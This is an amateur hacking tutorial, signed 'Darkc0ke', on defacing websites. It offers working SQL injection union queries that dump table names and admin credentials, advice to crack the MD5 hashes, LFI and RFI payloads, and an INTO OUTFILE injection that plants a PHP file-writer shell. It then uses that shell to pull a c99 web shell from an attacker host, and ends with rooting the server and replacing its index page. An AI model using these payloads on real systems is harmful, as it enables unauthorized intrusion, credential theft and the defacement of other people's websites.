This one is an old tutorial written by me. Modified it a bit..
PS: You may think this document is small, but its just that easy !!
As there are many ways to deface websites like;
Keylogging the webmaster of a website you want to hack. Not an easy way!
You can try LF (Local File Inclusion , script.php?page=../../../../etc/passwd%00 for example )
Webbased applications , you can use exploit-db.com for checking vulnerabilties
Also RFI (Remote File Inclusion , script.php?page=http://www.evil.com/shell.txt? )
XSS Cookie Grabbing and ClickJacking.
But I will describe , how to deface a website which is vulnerable to SQL Injection by uploading a shell.
Lets checkout the simple way!
1. Find out the column and table name:
script.php?id=-1 union all select 1,2,3,4,5,group_concat(table_name) from information_schema.tables where table_schema=database()--
script.php?id=-1 union all select 1,2,3,4,5,group_concat(column_name) from information_schema.columns where table_schema=database()-- Oke , probably there is a table named admin_users, and 2 columns named admin_name & admin_pass .
Lets get the data from it:
script.php?id=-1 union all select 1,2,3,4,5,group_concat(admin_name,0x3a,admin_pass),7,8,9,10 from admin_users-- If its a hash (32 characters) , Google md5 crack, and check some websites to crack the hash!
2. Log into the admin panel.
3. Try to find something , where you can upload things. Like albums or something.
Because album/image are 9/10 times writeable!
4. Upload a shell.PHP (not .txt, use .txt when you do RFI (Remote File Inclusion) for example.
Now go to your uploaded shell , site.com/c99.php , and if its possible, root it! (check some available exploits at exploit-db.com)
5. Change the index.html/php/asp or w/e if its writeable, to your own choice!
How to deface via SQL injection when magic_quotes are on and you find out the path of the server (ex. /home/www/site.com/public_html):
1. Use the infected column number, for example 7 :
site.com/script.php?id=-1 union all select 1,2,3,4,5,6,"<?php fwrite(fopen($_GET,'w'), file_get_contents($_GET)); ?>",8,9,10 INTO OUTFILE '/home/www/site.com/public_html/images/shell.php'-- use /images/ because this dir is almost always writeable.
2. now you can give parameters to shell.php, like:
http://www.site.com/images/shell.php?o=c99.php&i=http://www.EVILSITE.COM/shells/c99.txt This creates a file name c99.php with the content of
http://www.EVILSITE.COM/shells/c99.txt. 3. Guess !! Yes!!!! you can access your shell now via
http://www.site.com/images/c99.php Now go to your uploaded shell , site.com/images/c99.php , and if its possible, root it! (check some available exploits at exploit-db.com)
By ©Darkc0ke
